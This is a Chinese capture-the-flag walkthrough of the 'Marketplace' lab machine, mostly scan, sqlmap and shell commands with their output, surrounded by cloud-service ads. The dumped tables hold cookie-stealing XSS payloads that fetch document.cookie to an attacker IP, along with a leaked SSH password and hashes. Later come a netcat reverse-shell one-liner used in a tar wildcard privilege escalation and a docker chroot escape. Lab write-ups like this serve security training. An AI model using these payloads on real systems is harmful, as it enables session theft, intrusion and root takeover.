【靶机】maketplace

本文涉及的产品
云数据库 RDS MySQL,集群系列 2核4GB
推荐场景:
搭建个人博客
RDS MySQL Serverless 基础系列,0.5-2RCU 50GB
云数据库 RDS PostgreSQL,集群系列 2核4GB
简介: 本靶机难度适中,适合初学者与进阶的小伙伴。

前言

bilibili:Zacarx

www.zacarx.com

nmap

┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 -A 10.10.96.223
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 22:22 CST
Nmap scan report for 10.10.96.223 (10.10.96.223)
Host is up (0.27s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
|   256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_  256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp    open  http    nginx 1.19.2
|_http-title: The Marketplace
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-server-header: nginx/1.19.2
32768/tcp open  http    Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.03 seconds

目录扫描

──(zacarx㉿zacarx)-[~]
└─$ dirb http://10.10.198.229                                                             

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Oct 25 22:42:22 2022
URL_BASE: http://10.10.198.229/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.198.229/ ----
+ http://10.10.198.229/admin (CODE:403|SIZE:392)                                                               
+ http://10.10.198.229/Admin (CODE:403|SIZE:392)                                                               
+ http://10.10.198.229/ADMIN (CODE:403|SIZE:392)                                                               
> Testing: http://10.10.198.229/hidden                       

xss利用

nc -lnvp 4444

记得先进行监听后进行report

sqlmap进阶用法

┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6.7#stable}
|_ -| . ["]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:55:39 /2022-10-25/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[20:55:46] [INFO] testing connection to the target URL
[20:55:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:55:50] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:55:52] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[20:56:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:56:06] [WARNING] reflective value(s) found and filtering out
[20:56:08] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:56:14] [INFO] target URL appears to have 4 columns in query
[20:56:25] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[20:56:25] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 24 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://10.10.96.223:80/admin?user=-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x78697a6b7a4351494968436b714c4f587269657a745457465a504f786d797572634a504271534f55,0x71767a6b71),NULL,NULL,NULL-- -
---
[20:56:40] [INFO] testing MySQL
[20:56:41] [INFO] confirming MySQL
[20:56:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.19.2, Express
back-end DBMS: MySQL >= 8.0.0
[20:56:51] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] marketplace

[20:56:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 10 times
[20:56:52] [INFO] fetched data logged to text files under '/home/zacarx/.local/share/sqlmap/output/10.10.96.223'

[*] ending @ 20:56:52 /2022-10-25/

                                                                                                                                        
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -D marketplace --dump 
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.7#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:57:14 /2022-10-25/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] y
[20:57:17] [INFO] resuming back-end DBMS 'mysql' 
[20:57:17] [INFO] testing connection to the target URL
[20:57:18] [CRITICAL] anti-CSRF token 'token' can't be found at 'http://10.10.96.223:80/admin?user=1'. You can try to rerun by providing a valid value for option '--csrf-url'

[*] ending @ 20:57:18 /2022-10-25/

                                                                                                                                        
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -D marketplace --dump
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:57:21 /2022-10-25/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[20:57:24] [INFO] resuming back-end DBMS 'mysql' 
[20:57:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: http://10.10.96.223:80/admin?user=-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x78697a6b7a4351494968436b714c4f587269657a745457465a504f786d797572634a504271534f55,0x71767a6b71),NULL,NULL,NULL-- -
---
[20:57:25] [INFO] the back-end DBMS is MySQL
web application technology: Express, Nginx 1.19.2
back-end DBMS: MySQL 8
[20:57:25] [INFO] fetching tables for database: 'marketplace'
[20:57:26] [INFO] fetching columns for table 'items' in database 'marketplace'
[20:57:28] [INFO] fetching entries for table 'items' in database 'marketplace'
[20:57:29] [INFO] recognized possible password hashes in column 'image'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:57:39] [INFO] writing hashes to a temporary file '/tmp/sqlmaplnctc6c13775/sqlmaphashes-ft657rdv.txt' 
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:57:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[20:57:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[20:57:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:57:53] [INFO] starting 4 processes 
[20:58:03] [WARNING] no clear password(s) found                                                                                        
Database: marketplace
Table: items
[7 entries]
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
| id | image                            | title       | author | description                                                         |
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
| 1  | 867a9d1a2edc2995dca4b13de50fc545 | Dell Laptop | 2      | Good as new.                                                        |
| 2  | abffe546fb4cb740cc6b44f9e4c263df | A cactus    | 3      | Yep, that's a cactus.                                               |
| 3  | 598815c0f5554115631a3250e5db1719 | a           | 4      | axxxxx                                                              |
| 4  | 598815c0f5554115631a3250e5db1719 | a           | 4      | <script> alert(1) </script>                                         |
| 5  | 598815c0f5554115631a3250e5db1719 | a           | 4      | <script>fetch("http://10.17.0.91:4444/"+document.cookie)</script>   |
| 6  | 598815c0f5554115631a3250e5db1719 | av          | 4      | <script>fetch("http://10.10.96.223:4444/"+document.cookie)</script> |
| 7  | 598815c0f5554115631a3250e5db1719 | asa         | 4      | <script>fetch("http://10.17.0.91:4444/"+document.cookie)</script>   |
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+

[20:58:03] [INFO] table 'marketplace.items' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/items.csv'
[20:58:03] [INFO] fetching columns for table 'messages' in database 'marketplace'
[20:58:05] [INFO] fetching entries for table 'messages' in database 'marketplace'
Database: marketplace
Table: messages
[11 entries]
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | is_read | user_to | user_from | message_content                                                                                                                                                                                   |
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | 1       | 3       | 1         | Hello!\r\nAn automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password.\r\nYour new password is: @b_ENXkGYUCAv3zJ     |
| 2  | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 3  | 1       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
| 4  | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 5  | 1       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
| 6  | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 7  | 1       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
| 8  | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 9  | 1       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
| 10 | 1       | 4       | 1         | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 11 | 0       | 4       | 1         | Thank you for your report. We have reviewed the listing and found nothing that violates our rules.                                                                                                |
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

[20:58:06] [INFO] table 'marketplace.messages' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/messages.csv'
[20:58:06] [INFO] fetching columns for table 'users' in database 'marketplace'
[20:58:07] [INFO] fetching entries for table 'users' in database 'marketplace'
Database: marketplace
Table: users
[4 entries]
+----+--------------------------------------------------------------+----------+-----------------+
| id | password                                                     | username | isAdministrator |
+----+--------------------------------------------------------------+----------+-----------------+
| 1  | $2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW | system   | 0               |
| 2  | $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q | michael  | 1               |
| 3  | $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG | jake     | 1               |
| 4  | $2b$10$eWi7EwPf1euh6kC4AUM4iur1VWx4ZYG5EUUebOEO6cMVUUZTGYmsG | Zacarx   | 0               |
+----+--------------------------------------------------------------+----------+-----------------+

[20:58:09] [INFO] table 'marketplace.users' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/users.csv'
[20:58:09] [INFO] fetched data logged to text files under '/home/zacarx/.local/share/sqlmap/output/10.10.96.223'

[*] ending @ 20:58:09 /2022-10-25/

我们得知ssh密码 @b_ENXkGYUCAv3zJ,用户为system,maichael,jake其中的一个人

所以非常简单地我们就得到了一个shell

提权

通配符提权 - PENETRATION NOTE (heresecurity.wiki)

echo "mkfifo /tmp/lhennp; nc 10.17.0.91 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh



echo "" > "--checkpoint-action=exec=sh shell.sh"



echo "" > --checkpoint=1

sudo -u michael ./shell.sh

docker逃逸

docker | GTFOBins

This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root.

Any other Docker Linux image should work, e.g., debian.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
相关实践学习
如何快速连接云数据库RDS MySQL
本场景介绍如何通过阿里云数据管理服务DMS快速连接云数据库RDS MySQL,然后进行数据表的CRUD操作。
全面了解阿里云能为你做什么
阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,目前开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本。目前阿里云的产品涵盖弹性计算、数据库、存储与CDN、分析与搜索、云通信、网络、管理与监控、应用服务、互联网中间件、移动服务、视频服务等。通过本课程,来了解阿里云能够为你的业务带来哪些帮助 &nbsp; &nbsp; 相关的阿里云产品:云服务器ECS 云服务器 ECS(Elastic Compute Service)是一种弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。产品详情: https://www.aliyun.com/product/ecs
目录
相关文章
|
2月前
|
网络协议 关系型数据库 MySQL
红日靶机(三)笔记
红日靶机(三)笔记
|
2月前
|
网络协议 JavaScript Linux
HTB-TwoMillion 靶机笔记
HTB-TwoMillion 靶机笔记
|
7月前
|
XML 存储 安全
w1r3s 靶机学习
w1r3s 靶机学习
|
存储 网络协议 网络安全
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
91 0
VulnHub靶机DC2渗透测试笔记
|
安全 Shell PHP
Kira CTF靶机
Kira CTF靶机
112 0
|
安全 网络协议 Shell
HTB-Friendzone靶场
HTB-Friendzone靶场
|
安全 Shell 数据库
ColddBox 靶场
渗透这类 CMS 网站时,不要上来就狂扫,它大部分目录都是固定的,开源去看对应版本,商业的找几篇文章。特别 注意的是一定先去找对应版本漏洞,不要自己手工测基本行不通的。
122 0
ColddBox 靶场
|
SQL 安全 Shell
FristiLeaks v1.3靶机渗透
FristiLeaks v1.3靶机渗透
|
安全 Shell Linux
vulnhub靶机系列之zico2
vulnhub靶机系列之zico2
|
安全 Oracle Shell
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
278 1
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1